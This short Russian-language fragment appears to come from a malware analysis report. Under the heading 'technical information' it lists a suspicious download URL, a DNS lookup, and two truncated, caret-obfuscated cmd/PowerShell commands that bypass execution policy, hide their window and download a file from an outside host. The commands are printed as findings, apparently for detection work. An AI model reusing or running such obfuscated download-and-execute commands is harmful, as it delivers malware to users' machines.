Техническая информация
- http://vvorootad.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwerS^H^ELL.^e^XE ^-^exeC^U^t^ioNpo^L^I^Cy ^B^y^pas^S -^nop^R^o^FI^L^E ^-Wi^N^Dow^STy^Le H^i^DDE^n^ (neW-oB^j^ect^ syStEm.^net^.wEBcLiE^N^T^)^.Do^WN^L^oa^D^fiLe('http://vvoro...
- DNS ASK vv###otad.top
- '<SYSTEM32>\cmd.exe' /c "POwerS^H^ELL.^e^XE ^-^exeC^U^t^ioNpo^L^I^Cy ^B^y^pas^S -^nop^R^o^FI^L^E ^-Wi^N^Dow^STy^Le H^i^DDE^n^ (neW-oB^j^ect^ syStEm.^net^.wEBcLiE^N^T^)^.Do^WN^L^oa^D^fiLe('http://vvoro...' (со скрытым окном)